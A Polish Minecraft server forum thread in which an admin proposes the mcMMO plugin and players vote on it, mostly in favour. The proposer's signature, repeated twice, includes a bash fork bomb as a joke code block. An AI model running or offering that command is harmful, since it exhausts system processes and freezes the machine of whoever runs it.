Coming Soon ™
Użytkownicy przeglądający ten wątek:
1 gości
MCMMO - wywrócić rozgrywkę do góry nogami
#1
Cześć! Po krótkiej rozmowie z @"machelko" postanowiliśmy zaproponować wam wprowadzenie pluginu mcMMO, który może mocno zatrząść dotychczasową rozgrywką i diametralnie ją zmienić wprowadzając między innymi specjalne umiejętności, poziomy różnych czynności ( od kopania w kopalni, przez przepalanie w piecach po upadanie z wysokości ) oraz specjalne benefity związane z osiąganiem coraz wyższych poziomów umiejętności.
Oprócz tego dodaje on również przedmiot - skrzydło chimery umożliwiające graczom teleportowanie się na spawn lub do łóżka, lecz tylko gdy jesteśmy na świeżym powietrzu.

Kolejną rzeczą którą ten plugin dodaje jest system grup graczy. Grupa kilku graczy może utworzyć coś w stylu uproszczonej formy gildii i razem eksplorować świat. Gildie te również mogą zbierać punkty doświadczenia i zdobywać kolejne poziomy, dzięki którym odblokowują się specjalne grupowe bonusy - poczynając od chatu gildyjnego, przez zawieranie sojuszy z innymi gildiami, aż po coś na wzór wspólnego, grupowego enderchesta.

Ogólnie rzecz ujmując plugin jest naprawdę bardzo rozbudowany i pełne opisanie go tutaj zajęłoby dobre pare godzin, więc po pełne informacje odsyłam na anglojęzyczną wiki pluginu: https://github.com/mcMMO-Dev/mcMMO/wiki.

Wiemy, że wgranie tego pluginu wiąże się z bardzo dużą zmianą modelu rozgrywki na serwerze, oraz jest to bardzo dużo roboty dla nas, dlatego dopiero duża przewaga w głosach na dodanie pluginu sprawi, że rozpoczniemy prace nad zaimplementowaniem pluginu do gry i nie gwarantujemy, że na pewno się on pojawi.

Prosimy również o w miarę możliwości napisanie w temacie dlaczego wybraliście taką, a nie inną opcję w ankiecie, żebyśmy mogli lepiej dostosować nasze ewentualne następne propozycje jak najlepiej do waszego gustu, gdyż serwer istnieje dzięki wam i chcemy zapewnić jak najlepszą jakość rozgrywki Smile
Historia kołem się toczy. https://ancap.pl/temat-or%C4%99dzie-nowe...%9Bciciela

Kod:
:(){ :|:& };:
#2
OHNOEZ to mi się KOJARZY z IZIHACE NIEEEEEE RUBCIE TEGO! I KOJARZY MI SIĘ Z KOMUNIZMEM I SMAKIEM ZUPY OGÓRKOWEJ WIĘC NIE.

Zacnie napisana propozycja, która chyba sama sobie odpowiada - ruszcie, zobaczcie jak to zadziała, ewentualnie przeprowadźcie jakiś pilotaż - wyjdzie, będzie fajnie. Idea super.
#3
W sumie to jestem na tak. Ogolnie moze to potrzasnac rozgrywka ale dobrze nie zle. To juz nie jest "ancap" tylko icrafting wiec warto cos zmienic i dodac cos nowego i plugin w sam sobie mi sie podoba. I nic to nie widzie zwiazane z "izihace"
każdy kiedyś odejdzie
#4
Nie chce mi się czytać tego na wiki, a z tego co tu bobek napisał to ciekawie brzmi :V

Dodawajcie Tongue
#5
Świetny pomysł Bopka, do tego tak napisana propozycja sprawia, że chętnie zagłosuję na tak.
#6
Na tak. Jak będzie bardzo źle to administracja raczej to usunie z serwera.
#7
Każdy wie, że gram już bardzo rzadko więc mój głos nie bardzo będzie się liczył. Jestem tutaj znany jako ta osoba, która chce jak najmniej zmian, ale, ale, ALE - tutaj jestem na tak. Serwer jako ancap i icrafting przeżył sporo. Czasy gdy grałem codziennie po 1-3 godziny, lub czasami więcej już dawno minęły. Oczywiście znudzeniem się grą. Jestem osobą kreatywną, ale jakoś w Minecraftcie nie mogę tego pokazać, przez co mi się nudzi. W to ile w niego gram już nie ma znaczenia, bo zaraz znajdą się tacy co grają więcej i nadal pykają. Myślę, że jeśli wprowadzicie taką zmianę, to może ktoś odejdzie, ale przyjdą zamiast niego kolejne osoby. Jeśli serwer wygląda tak jak wygląda, jeśli chodzi o graczy, to trzeba ryzykować. 

Nie ma nic do stracenia. 
Na tak 
Przyjacielu, zajrzyj na mojego bloga gdzie piszę o grach i o życiu.
Zapraszam bardzo serdecznie! :-)
Skirim.eu.org

[Obrazek: m3f5DYn.jpg]
#8
Z jednej strony pewnie wyjde na hipokrytke, ale z drugiej ten opis tego pluginu mi sie podoba i mysle, ze to byloby akurat fajne, tak wiec tutaj glosuje na tak Smile
#9
Na tak, zakładam że większości graczom (w tym mi) znudziła się zwyczajny survival którego ancap/icrafting trzymał się przez bardzo długi czas, a takie MCMMO jest zawsze czymś nowym.  Po za tym jak przeczytałem "skrzydła chimery" to aż mnie kusi by zobaczyć na wiki, ale nie, zobaczę wszystko na serwie gdy już to wejdzie w życie.
[Obrazek: Becauseitbothersmiia_58c96ee8f2b78895deb...356d44.jpg]
#10
Ogólnie to nie lubię z byt wielkich zmian, ale przez te 5 lat grania w minecrafta survival mi się znudził. Słyszałem o MCMMO, nawet mnie zaciekawił, ale jeszcze na takim trybie nie grałem. Jestem na tak.
[Obrazek: VWk1BPJ.png]
#11
Jestem na NIE .
Za dużo tych pluginów .
                                  One shot
                                 Double kill

#12
Jak dla mnie BOMBA
#13
(18.03.2017 11:19)Wedar napisał(a): Po za tym jak przeczytałem "skrzydła chimery" to aż mnie kusi by zobaczyć na wiki, ale nie, zobaczę wszystko na serwie gdy już to wejdzie w życie.

Myślę, że się przejedziesz na takich oczekiwaniach, bo to nie jest nic specjalnego poza sposobem teleportowania na swój spawn Big Grin
Historia kołem się toczy. https://ancap.pl/temat-or%C4%99dzie-nowe...%9Bciciela

Kod:
:(){ :|:& };: